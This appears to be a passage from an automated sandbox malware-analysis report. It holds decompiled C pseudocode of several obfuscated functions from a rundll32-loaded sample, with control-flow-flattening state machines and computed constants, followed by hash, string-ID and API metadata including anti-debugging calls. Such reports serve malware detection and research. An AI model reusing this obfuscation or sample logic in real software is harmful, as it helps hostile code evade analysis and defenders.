                                                                                                                                                            									_push(_v92);
                                                                                                                                                            									_v68 = _t308;
                                                                                                                                                            									_push(_v156);
                                                                                                                                                            									_t284 = _v76;
                                                                                                                                                            									_v60 = E0038DCF7(_v76, 0x37173c, _t317);
                                                                                                                                                            									_t307 = E0038DE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
                                                                                                                                                            									E0037A8B0(_v144, _v60, _v112);
                                                                                                                                                            									_t311 =  &(_t311[0x19]);
                                                                                                                                                            									_t280 = 0xd8aa277;
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L13:
                                                                                                                                                            						return _t307;
                                                                                                                                                            					}
                                                                                                                                                            					_t263 = E00374241(_t280, _v120,  &_v72, _a28, _v104);
                                                                                                                                                            					_t311 =  &(_t311[3]);
                                                                                                                                                            					__eflags = _t263;
                                                                                                                                                            					if(_t263 == 0) {
                                                                                                                                                            						_t280 = 0xcb447d9;
                                                                                                                                                            						goto L10;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t280 = 0xdb35d55;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					goto L13;
                                                                                                                                                            					L10:
                                                                                                                                                            					__eflags = _t280 - 0xcb447d9;
                                                                                                                                                            				} while (_t280 != 0xcb447d9);
                                                                                                                                                            				goto L13;
                                                                                                                                                            			}

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: T.~$hc$ru$($0$K<
                                                                                                                                                            • API String ID: 0-2343433060
                                                                                                                                                            • Opcode ID: 50097c7c6200918f5a99e6a5c161709aac9a69d774ceab9d9cf151561a3cce55
                                                                                                                                                            • Instruction ID: 0e3849757a9a6999c3e92711cd6f58d0e72a368d4292b197f1b15f33987dc04f
                                                                                                                                                            • Opcode Fuzzy Hash: 50097c7c6200918f5a99e6a5c161709aac9a69d774ceab9d9cf151561a3cce55
                                                                                                                                                            • Instruction Fuzzy Hash: 3BC133725083809FD769CF21C986A5BFBE1FBD5704F104A1DF29A96260D7B68908CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                            			E00373E3F() {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				void* _t213;
                                                                                                                                                            				signed int _t214;
                                                                                                                                                            				void* _t216;
                                                                                                                                                            				signed int _t222;
                                                                                                                                                            				intOrPtr _t223;
                                                                                                                                                            				signed int _t224;
                                                                                                                                                            				signed int _t225;
                                                                                                                                                            				signed int _t226;
                                                                                                                                                            				signed int _t227;
                                                                                                                                                            				signed int _t228;
                                                                                                                                                            				signed int _t229;
                                                                                                                                                            				void* _t230;
                                                                                                                                                            				void* _t236;
                                                                                                                                                            				void* _t257;
                                                                                                                                                            				signed int* _t261;
                                                                                                                                                            
                                                                                                                                                            				_t261 =  &_v100;
                                                                                                                                                            				_v8 = 0xc74bd8;
                                                                                                                                                            				_v4 = 0;
                                                                                                                                                            				_v72 = 0x3d4417;
                                                                                                                                                            				_v72 = _v72 << 8;
                                                                                                                                                            				_v72 = _v72 + 0xffff33fd;
                                                                                                                                                            				_v72 = _v72 ^ 0xbd434afc;
                                                                                                                                                            				_v32 = 0xa9ac19;
                                                                                                                                                            				_v32 = _v32 + 0x4aca;
                                                                                                                                                            				_v32 = _v32 ^ 0x00a9f6e1;
                                                                                                                                                            				_v40 = 0x1f6a8;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_v40 = _v40 * 0x6f;
                                                                                                                                                            				_t257 = 0xf52a3f4;
                                                                                                                                                            				_v40 = _v40 ^ 0x00d19880;
                                                                                                                                                            				_v44 = 0x168b17;
                                                                                                                                                            				_v44 = _v44 + 0x13a5;
                                                                                                                                                            				_v44 = _v44 ^ 0x001ee95f;
                                                                                                                                                            				_v48 = 0xfac2ed;
                                                                                                                                                            				_v48 = _v48 + 0xffff2a35;
                                                                                                                                                            				_v48 = _v48 ^ 0x00fbd9f9;
                                                                                                                                                            				_v92 = 0xc00c53;
                                                                                                                                                            				_v92 = _v92 + 0xffff1aa9;
                                                                                                                                                            				_v92 = _v92 + 0xf2d7;
                                                                                                                                                            				_t225 = 0x68;
                                                                                                                                                            				_v92 = _v92 / _t225;
                                                                                                                                                            				_v92 = _v92 ^ 0x0000565c;
                                                                                                                                                            				_v68 = 0xf2ac97;
                                                                                                                                                            				_v68 = _v68 ^ 0x99fc0549;
                                                                                                                                                            				_v68 = _v68 >> 0xf;
                                                                                                                                                            				_v68 = _v68 ^ 0x000a8804;
                                                                                                                                                            				_v24 = 0xf89d13;
                                                                                                                                                            				_t226 = 0x49;
                                                                                                                                                            				_v24 = _v24 / _t226;
                                                                                                                                                            				_v24 = _v24 ^ 0x000ed122;
                                                                                                                                                            				_v96 = 0x9976f7;
                                                                                                                                                            				_v96 = _v96 >> 0xe;
                                                                                                                                                            				_v96 = _v96 ^ 0xdd1af6ea;
                                                                                                                                                            				_v96 = _v96 ^ 0x684d855d;
                                                                                                                                                            				_v96 = _v96 ^ 0xb5551d4c;
                                                                                                                                                            				_v28 = 0x12a2d6;
                                                                                                                                                            				_t227 = 0xe;
                                                                                                                                                            				_v28 = _v28 * 0x29;
                                                                                                                                                            				_v28 = _v28 ^ 0x02ffade5;
                                                                                                                                                            				_v100 = 0x1d8880;
                                                                                                                                                            				_v100 = _v100 + 0x8a1e;
                                                                                                                                                            				_v100 = _v100 * 0x7c;
                                                                                                                                                            				_v100 = _v100 + 0xffff421a;
                                                                                                                                                            				_v100 = _v100 ^ 0x0e9f1559;
                                                                                                                                                            				_v36 = 0x784079;
                                                                                                                                                            				_v36 = _v36 / _t227;
                                                                                                                                                            				_v36 = _v36 ^ 0x0007caf6;
                                                                                                                                                            				_v60 = 0xd037f8;
                                                                                                                                                            				_v60 = _v60 >> 0xf;
                                                                                                                                                            				_v60 = _v60 + 0xfffff3b4;
                                                                                                                                                            				_v60 = _v60 ^ 0xfff3df4e;
                                                                                                                                                            				_v64 = 0x95f516;
                                                                                                                                                            				_v64 = _v64 + 0xffffc55a;
                                                                                                                                                            				_v64 = _v64 | 0x523f0ae6;
                                                                                                                                                            				_v64 = _v64 ^ 0x52b19695;
                                                                                                                                                            				_v84 = 0x271827;
                                                                                                                                                            				_v84 = _v84 + 0xffff7017;
                                                                                                                                                            				_v84 = _v84 + 0x1e15;
                                                                                                                                                            				_v84 = _v84 ^ 0xa1c53b6b;
                                                                                                                                                            				_v84 = _v84 ^ 0xa1e64a9e;
                                                                                                                                                            				_v52 = 0x3d5883;
                                                                                                                                                            				_v52 = _v52 >> 5;
                                                                                                                                                            				_v52 = _v52 << 3;
                                                                                                                                                            				_v52 = _v52 ^ 0x000b56f4;
                                                                                                                                                            				_v56 = 0xd5acf2;
                                                                                                                                                            				_v56 = _v56 ^ 0x15c9a5cd;
                                                                                                                                                            				_v56 = _v56 << 3;
                                                                                                                                                            				_v56 = _v56 ^ 0xa8e6808a;
                                                                                                                                                            				_v88 = 0xcc2476;
                                                                                                                                                            				_v88 = _v88 + 0x4ceb;
                                                                                                                                                            				_v88 = _v88 ^ 0xdbab884b;
                                                                                                                                                            				_t228 = 0x4f;
                                                                                                                                                            				_v88 = _v88 / _t228;
                                                                                                                                                            				_v88 = _v88 ^ 0x02ce2d39;
                                                                                                                                                            				_v20 = 0x9b21e;
                                                                                                                                                            				_v20 = _v20 + 0x218b;
                                                                                                                                                            				_v20 = _v20 ^ 0x00037084;
                                                                                                                                                            				_v76 = 0xcba48;
                                                                                                                                                            				_t229 = 0x5a;
                                                                                                                                                            				_t222 = _v12;
                                                                                                                                                            				_v76 = _v76 * 0x7b;
                                                                                                                                                            				_v76 = _v76 + 0x3acc;
                                                                                                                                                            				_v76 = _v76 << 0x10;
                                                                                                                                                            				_v76 = _v76 ^ 0xbb6cb0a9;
                                                                                                                                                            				_v80 = 0x9c886e;
                                                                                                                                                            				_v80 = _v80 ^ 0x88757b42;
                                                                                                                                                            				_t230 = 0x5c;
                                                                                                                                                            				_v80 = _v80 / _t229;
                                                                                                                                                            				_v80 = _v80 << 0xe;
                                                                                                                                                            				_v80 = _v80 ^ 0x5c6ae118;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t213 = 0xa360d2e;
                                                                                                                                                            					do {
                                                                                                                                                            						while(_t257 != _t213) {
                                                                                                                                                            							if(_t257 == 0xb87cfc3) {
                                                                                                                                                            								_t223 =  *0x393e10; // 0x0
                                                                                                                                                            								_t224 = _t223 + 0x1c;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									__eflags =  *_t224 - _t230;
                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t224 = _t224 + 2;
                                                                                                                                                            									__eflags = _t224;
                                                                                                                                                            								}
                                                                                                                                                            								_t222 = _t224 + 2;
                                                                                                                                                            								_t257 = 0xc7301de;
                                                                                                                                                            								goto L1;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t257 == 0xc7301de) {
                                                                                                                                                            									_push(_v48);
                                                                                                                                                            									_push(_v44);
                                                                                                                                                            									_t216 = E0038DCF7(_v40, 0x371080, __eflags);
                                                                                                                                                            									_pop(_t236);
                                                                                                                                                            									__eflags = E0037AAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
                                                                                                                                                            									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
                                                                                                                                                            									E0037A8B0(_v60, _t216, _v64);
                                                                                                                                                            									_t261 =  &(_t261[0xf]);
                                                                                                                                                            									L14:
                                                                                                                                                            									_t213 = 0xa360d2e;
                                                                                                                                                            									_t230 = 0x5c;
                                                                                                                                                            									goto L15;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t257 == 0xdd28c3f) {
                                                                                                                                                            										E00371FD1(_v20, _v76, _v80, _v16);
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t257 != 0xf52a3f4) {
                                                                                                                                                            											goto L15;
                                                                                                                                                            										} else {
                                                                                                                                                            											_t257 = 0xb87cfc3;
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							L18:
                                                                                                                                                            							return _v12;
                                                                                                                                                            						}
                                                                                                                                                            						_t214 = E00371F53(_v16, _v84, _v52, _t222, _v56, _v88);
                                                                                                                                                            						_t261 =  &(_t261[4]);
                                                                                                                                                            						__eflags = _t214;
                                                                                                                                                            						_t257 = 0xdd28c3f;
                                                                                                                                                            						_t191 = _t214 == 0;
                                                                                                                                                            						__eflags = _t191;
                                                                                                                                                            						_v12 = 0 | _t191;
                                                                                                                                                            						goto L14;
                                                                                                                                                            						L15:
                                                                                                                                                            						__eflags = _t257 - 0x57f878b;
                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                            					goto L18;
                                                                                                                                                            				}
                                                                                                                                                            			}

                                                                                                                                                            0x00374201
                                                                                                                                                            0x00374204
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00374210
                                                                                                                                                            0x00374210
                                                                                                                                                            0x00374210
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037421c

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: .6$.6$.6$y@x$?R$L
                                                                                                                                                            • API String ID: 0-3177096336
                                                                                                                                                            • Opcode ID: 0f6ff8f1bfbcf90e6f2827e8de9357e2cad81bc83d7b161c48737299bc856d97
                                                                                                                                                            • Instruction ID: 9e5ca9fe64634afd6227d91b4b17b28e3897cc81a7a2ae01fa27391e03b98045
                                                                                                                                                            • Opcode Fuzzy Hash: 0f6ff8f1bfbcf90e6f2827e8de9357e2cad81bc83d7b161c48737299bc856d97
                                                                                                                                                            • Instruction Fuzzy Hash: 09A13FB25083409FD7A8CF69D88A41BBBE1FBD4758F108A1DF1998A260D3B58949CF47
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E0037B74D(void* __ecx, void* __edx) {
                                                                                                                                                            				signed int _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed int _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed int _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				signed int _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				void* _t231;
                                                                                                                                                            				intOrPtr _t232;
                                                                                                                                                            				intOrPtr _t233;
                                                                                                                                                            				void* _t237;
                                                                                                                                                            				signed int _t239;
                                                                                                                                                            				signed int _t240;
                                                                                                                                                            				signed int _t241;
                                                                                                                                                            				signed int _t242;
                                                                                                                                                            				void* _t266;
                                                                                                                                                            				void* _t267;
                                                                                                                                                            				signed int* _t270;
                                                                                                                                                            				signed int* _t271;
                                                                                                                                                            
                                                                                                                                                            				_t270 =  &_v104;
                                                                                                                                                            				_v4 = _v4 & 0x00000000;
                                                                                                                                                            				_v12 = 0x6c2b32;
                                                                                                                                                            				_v8 = 0x58b11;
                                                                                                                                                            				_v64 = 0x37f8ee;
                                                                                                                                                            				_v64 = _v64 + 0xffff6702;
                                                                                                                                                            				_v64 = _v64 ^ 0xad40df3f;
                                                                                                                                                            				_v64 = _v64 ^ 0xad79282c;
                                                                                                                                                            				_v100 = 0x6d524;
                                                                                                                                                            				_v100 = _v100 >> 0xf;
                                                                                                                                                            				_v100 = _v100 + 0x2921;
                                                                                                                                                            				_v100 = _v100 >> 6;
                                                                                                                                                            				_v100 = _v100 ^ 0x00050ee9;
                                                                                                                                                            				_v28 = 0x9e9a;
                                                                                                                                                            				_t266 = __edx;
                                                                                                                                                            				_t237 = __ecx;
                                                                                                                                                            				_t267 = 0x52ffaa2;
                                                                                                                                                            				_t239 = 0xb;
                                                                                                                                                            				_v28 = _v28 / _t239;
                                                                                                                                                            				_v28 = _v28 ^ 0x00028e70;
                                                                                                                                                            				_v32 = 0x2476b5;
                                                                                                                                                            				_t240 = 0x6f;
                                                                                                                                                            				_v32 = _v32 / _t240;
                                                                                                                                                            				_v32 = _v32 ^ 0x0008b44d;
                                                                                                                                                            				_v60 = 0x9e7d2d;
                                                                                                                                                            				_v60 = _v60 >> 0xc;
                                                                                                                                                            				_v60 = _v60 << 0xe;
                                                                                                                                                            				_v60 = _v60 ^ 0x02752993;
                                                                                                                                                            				_v24 = 0xe09194;
                                                                                                                                                            				_t241 = 0x44;
                                                                                                                                                            				_v24 = _v24 / _t241;
                                                                                                                                                            				_v24 = _v24 ^ 0x0009703f;
                                                                                                                                                            				_v96 = 0x854eb1;
                                                                                                                                                            				_v96 = _v96 + 0xc1c6;
                                                                                                                                                            				_v96 = _v96 * 0x1a;
                                                                                                                                                            				_v96 = _v96 | 0x594c04b7;
                                                                                                                                                            				_v96 = _v96 ^ 0x5dd9e9b5;
                                                                                                                                                            				_v20 = 0x86d30b;
                                                                                                                                                            				_v20 = _v20 | 0xe45dff90;
                                                                                                                                                            				_v20 = _v20 ^ 0xe4d4624e;
                                                                                                                                                            				_v92 = 0x8501b9;
                                                                                                                                                            				_v92 = _v92 >> 6;
                                                                                                                                                            				_v92 = _v92 * 0x2f;
                                                                                                                                                            				_v92 = _v92 + 0xe9ed;
                                                                                                                                                            				_v92 = _v92 ^ 0x0060653e;
                                                                                                                                                            				_v52 = 0xaa921f;
                                                                                                                                                            				_v52 = _v52 ^ 0x3dfd2146;
                                                                                                                                                            				_v52 = _v52 >> 1;
                                                                                                                                                            				_v52 = _v52 ^ 0x1ea8ab64;
                                                                                                                                                            				_v56 = 0x2765e6;
                                                                                                                                                            				_v56 = _v56 ^ 0x5c8ea534;
                                                                                                                                                            				_v56 = _v56 | 0xccee86e2;
                                                                                                                                                            				_v56 = _v56 ^ 0xdcebf872;
                                                                                                                                                            				_v88 = 0x89b797;
                                                                                                                                                            				_v88 = _v88 + 0x84ba;
                                                                                                                                                            				_v88 = _v88 + 0xc14;
                                                                                                                                                            				_v88 = _v88 | 0xbe23ba3f;
                                                                                                                                                            				_v88 = _v88 ^ 0xbea6e118;
                                                                                                                                                            				_v48 = 0x866a1d;
                                                                                                                                                            				_v48 = _v48 >> 9;
                                                                                                                                                            				_v48 = _v48 * 0x16;
                                                                                                                                                            				_v48 = _v48 ^ 0x0007ec78;
                                                                                                                                                            				_v16 = 0x7d5d8a;
                                                                                                                                                            				_v16 = _v16 >> 8;
                                                                                                                                                            				_v16 = _v16 ^ 0x000578c4;
                                                                                                                                                            				_v68 = 0x2c77b1;
                                                                                                                                                            				_v68 = _v68 | 0xad369f51;
                                                                                                                                                            				_v68 = _v68 << 0xd;
                                                                                                                                                            				_v68 = _v68 ^ 0xdff48475;
                                                                                                                                                            				_v72 = 0x3ef83;
                                                                                                                                                            				_v72 = _v72 << 3;
                                                                                                                                                            				_v72 = _v72 + 0xb46;
                                                                                                                                                            				_v72 = _v72 ^ 0x001ba742;
                                                                                                                                                            				_v76 = 0x4a0f2c;
                                                                                                                                                            				_t242 = 0x6a;
                                                                                                                                                            				_v76 = _v76 * 0x54;
                                                                                                                                                            				_v76 = _v76 << 0xa;
                                                                                                                                                            				_v76 = _v76 ^ 0x33e29f20;
                                                                                                                                                            				_v36 = 0x9fb368;
                                                                                                                                                            				_v36 = _v36 >> 0xb;
                                                                                                                                                            				_v36 = _v36 ^ 0x000f389a;
                                                                                                                                                            				_v40 = 0x5cfe3a;
                                                                                                                                                            				_v40 = _v40 + 0x27ff;
                                                                                                                                                            				_v40 = _v40 ^ 0x005ee30c;
                                                                                                                                                            				_v104 = 0xfd26ea;
                                                                                                                                                            				_v104 = _v104 << 9;
                                                                                                                                                            				_v104 = _v104 + 0xffff1095;
                                                                                                                                                            				_v104 = _v104 + 0xffffd24c;
                                                                                                                                                            				_v104 = _v104 ^ 0xfa4b2973;
                                                                                                                                                            				_v80 = 0xbb493f;
                                                                                                                                                            				_v80 = _v80 + 0x4ae2;
                                                                                                                                                            				_v80 = _v80 | 0xbb4dbcb8;
                                                                                                                                                            				_v80 = _v80 + 0x3bc7;
                                                                                                                                                            				_v80 = _v80 ^ 0xbbf0b3fa;
                                                                                                                                                            				_v44 = 0xfc3c2e;
                                                                                                                                                            				_v44 = _v44 << 0x10;
                                                                                                                                                            				_v44 = _v44 + 0xffff4208;
                                                                                                                                                            				_v44 = _v44 ^ 0x3c281d99;
                                                                                                                                                            				_v84 = 0xc50344;
                                                                                                                                                            				_v84 = _v84 | 0xb9ed19f4;
                                                                                                                                                            				_v84 = _v84 / _t242;
                                                                                                                                                            				_t243 = 0x6b;
                                                                                                                                                            				_v84 = _v84 / _t243;
                                                                                                                                                            				_v84 = _v84 ^ 0x000f16db;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t231 = 0xc3f018b;
                                                                                                                                                            					do {
                                                                                                                                                            						L2:
                                                                                                                                                            						while(_t267 != 0x52ffaa2) {
                                                                                                                                                            							if(_t267 == 0x865547f) {
                                                                                                                                                            								_t243 = _v88;
                                                                                                                                                            								_t232 = E0037CDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                                                            								_t270 =  &(_t270[2]);
                                                                                                                                                            								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
                                                                                                                                                            								__eflags = _t232;
                                                                                                                                                            								_t231 = 0xc3f018b;
                                                                                                                                                            								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            							if(_t267 == 0xb133873) {
                                                                                                                                                            								_push(_v32);
                                                                                                                                                            								_t233 = E0038C3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
                                                                                                                                                            								_t271 =  &(_t270[4]);
                                                                                                                                                            								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
                                                                                                                                                            								__eflags = _t233;
                                                                                                                                                            								if(_t233 != 0) {
                                                                                                                                                            									E00377B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
                                                                                                                                                            									_push( *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                                                            									_push(_v56);
                                                                                                                                                            									_push(_v52);
                                                                                                                                                            									_t243 = _v20;
                                                                                                                                                            									E00377C37(_v20, _v92);
                                                                                                                                                            									_t270 =  &(_t271[6]);
                                                                                                                                                            									_t267 = 0x865547f;
                                                                                                                                                            									goto L1;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t267 == 0xb7a2405) {
                                                                                                                                                            									return E00389E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                                                            								}
                                                                                                                                                            								if(_t267 != _t231) {
                                                                                                                                                            									goto L13;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t233 = E003746BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E00374C5D, _v104);
                                                                                                                                                            									_t270 =  &(_t270[0xa]);
                                                                                                                                                            									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
                                                                                                                                                            									if(_t233 == 0) {
                                                                                                                                                            										_t267 = 0xb7a2405;
                                                                                                                                                            										while(1) {
                                                                                                                                                            											L1:
                                                                                                                                                            											_t231 = 0xc3f018b;
                                                                                                                                                            											goto L2;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							return _t233;
                                                                                                                                                            						}
                                                                                                                                                            						_t267 = 0xb133873;
                                                                                                                                                            						L13:
                                                                                                                                                            						__eflags = _t267 - 0x1aeb2e;
                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                            					return _t231;
                                                                                                                                                            				}
                                                                                                                                                            			}









































                                                                                                                                                            0x0037bb00
                                                                                                                                                            0x0037bb04
                                                                                                                                                            0x0037bb0c
                                                                                                                                                            0x0037bb10
                                                                                                                                                            0x0037bb15
                                                                                                                                                            0x0037bb18
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037bb18
                                                                                                                                                            0x0037ba78
                                                                                                                                                            0x0037ba7a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037bb75
                                                                                                                                                            0x0037ba82
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ba88
                                                                                                                                                            0x0037baa9
                                                                                                                                                            0x0037baae
                                                                                                                                                            0x0037bab1
                                                                                                                                                            0x0037bab6
                                                                                                                                                            0x0037babc
                                                                                                                                                            0x0037ba53
                                                                                                                                                            0x0037ba53
                                                                                                                                                            0x0037ba53
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ba53
                                                                                                                                                            0x0037ba53
                                                                                                                                                            0x0037bab6
                                                                                                                                                            0x0037ba82
                                                                                                                                                            0x0037bb7d
                                                                                                                                                            0x0037bb7d
                                                                                                                                                            0x0037bb4d
                                                                                                                                                            0x0037bb52
                                                                                                                                                            0x0037bb52
                                                                                                                                                            0x0037bb52
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ba58

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: !)$2+l$>e`$?p$J$e'
                                                                                                                                                            • API String ID: 0-1675410552
                                                                                                                                                            • Opcode ID: 56479783c7b8be5ab30605e67e872b1b9498685077a8c77307e6ec490f43733c
                                                                                                                                                            • Instruction ID: ae863ec2d5febc0c95233f649700a852ac23e8ffb371518a9d6b716f56d291e2
                                                                                                                                                            • Opcode Fuzzy Hash: 56479783c7b8be5ab30605e67e872b1b9498685077a8c77307e6ec490f43733c
                                                                                                                                                            • Instruction Fuzzy Hash: 04B12E724083409FC369CF65C58A40BFBF2BBC5758F108A1CF58A96260D3B9CA59CF86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2579439406-0
                                                                                                                                                            • Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                                                            • Instruction ID: 3237c6aacfb12be4d9d12df29f826ae8d0614ddfd4a103b53015e2b6a0b2c6c3
                                                                                                                                                            • Opcode Fuzzy Hash: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
                                                                                                                                                            • Instruction Fuzzy Hash: B021FFB4801320CFFB11DF68EDC56483BB4FB88315F50606AE90D87A71E7B16A80AF56
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                            			E00390056() {
